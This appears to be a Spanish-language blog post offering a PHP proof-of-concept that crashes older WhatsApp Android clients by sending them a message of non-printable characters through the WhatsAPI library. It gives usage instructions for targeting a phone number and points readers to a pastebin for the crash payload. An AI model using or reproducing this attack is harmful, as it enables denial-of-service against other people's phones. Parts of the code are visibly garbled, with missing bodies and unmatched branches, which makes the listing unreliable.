Modo de uso de script
root@rodrix:~# php wacrash.php 549XXXXXXXXXX
Recuerden que el num de contacto que van a crashear debe ser de 13 dígitos. En la variable $msg deben copiar y pegar el contenido del pastebin que dejo en el comentario, donde se encuentran los caracteres especiales para crashear whatsapp.
Código: PHP
- <?php
- /*
- * Title: WhatsApp Remote Crash with PHP
- * Product: WhatsApp
- * Vendor Homepage:
- * Vulnerable Version(s): 2.11.476
- * Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
- * Mirror:
- * Date: 05/02/2015
- *
- * Author Exploit:
- * Rodrigo Avila - @el_rodrix - <>
- * Credits:
- * Daniel Godoy - @0xhielasangre - <>
- * Gonza Cabrera - @Gonnza_Cabrera - <>
- *
- * Reference:,569.0.html
- *
- *
- *
- *
- * Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
- * It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
- * engaging in an interactive conversation over WhatsApp protocol
- */
- require 'src/whatsprot.class.php';
- function fgets_u($pStdn)
- {
- print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
- return FALSE;
- } elseif ($num_changed_streams > 0) {
- }
- return null;
- }
- $nickname = "RemoteExecution";
- $sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
- $imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
- $password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
- $msg = "RemoteExecution"; //Copy paste and send this message ->
- $usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
- if ($argc < 2) {
- echo $usage;
- }
- $dst = $_SERVER['argv'][1];
- echo "[] Logging in as '$nickname' ($sender)\n";
- $wa = new WhatsProt($sender, $imei, $nickname, false);
- $wa->connect();
- $wa->loginWithPassword($password);
- echo "\n[] Send message to $dst: $msg\n";
- $wa->sendMessage($dst , $msg);
- echo "\n";
- }else{
- echo $usage;
- }
- }else{
- echo $usage;
- }
Adjunto screenshot del momento que crashea el app de whatsapp en Android. Para esta PoC se utilizo un Samsung Galaxy S4, con WhatsApp+ v6.65.
Información del dispositivo:
WhatsApp+ crashea:
WhatsApp+ crashea:
Información de WhatsApp app:
No hay comentarios:
Publicar un comentario